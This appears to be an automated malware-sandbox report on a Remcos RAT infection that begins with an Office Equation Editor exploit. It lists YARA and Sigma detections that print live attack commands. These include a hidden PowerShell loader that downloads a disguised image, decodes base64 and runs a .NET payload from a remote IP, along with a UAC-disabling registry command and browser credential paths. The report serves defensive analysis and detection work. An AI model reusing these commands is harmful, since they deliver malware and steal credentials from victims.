        0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4a8:$a1: Remcos restarted by watchdog!
          • 0x6ca20:$a3: %02i:%02i:%02i:%03i
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          14.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            14.2.RegAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              14.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6aaa8:$a1: Remcos restarted by watchdog!
              • 0x6b020:$a3: %02i:%02i:%02i:%03i
              14.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
              • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
              • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x64b6c:$str_b2: Executing file:
              • 0x65bec:$str_b3: GetDirectListeningPort
              • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x65718:$str_b7: \update.vbs
              • 0x64b94:$str_b9: Downloaded file:
              • 0x64b80:$str_b10: Downloading file:
              • 0x64c24:$str_b12: Failed to upload file:
              • 0x65bb4:$str_b13: StartForward
              • 0x65bd4:$str_b14: StopForward
              • 0x65670:$str_b15: fso.DeleteFile "
              • 0x65604:$str_b16: On Error Resume Next
              • 0x656a0:$str_b17: fso.DeleteFolder "
              • 0x64c14:$str_b18: Uploaded file:
              • 0x64bd4:$str_b19: Unable to delete:
              • 0x65638:$str_b20: while fso.FileExists("
              • 0x650b1:$str_c0: [Firefox StoredLogins not found]
              14.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                Click to see the 15 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 107.172.31.21, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3972, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3972, TargetFilename: C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3972, Protocol: tcp, SourceIp: 107.172.31.21, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3368, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , ProcessId: 4056, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3368, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" , ProcessId: 4056, ProcessName: wscript.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                Sigma detected: Excel Network Connections
                Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 88.99.66.38, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3368, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 2780, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq", ProcessId: 1764, ProcessName: RegAsm.exe
                Sigma detected: Suspicious Office Outbound Connections
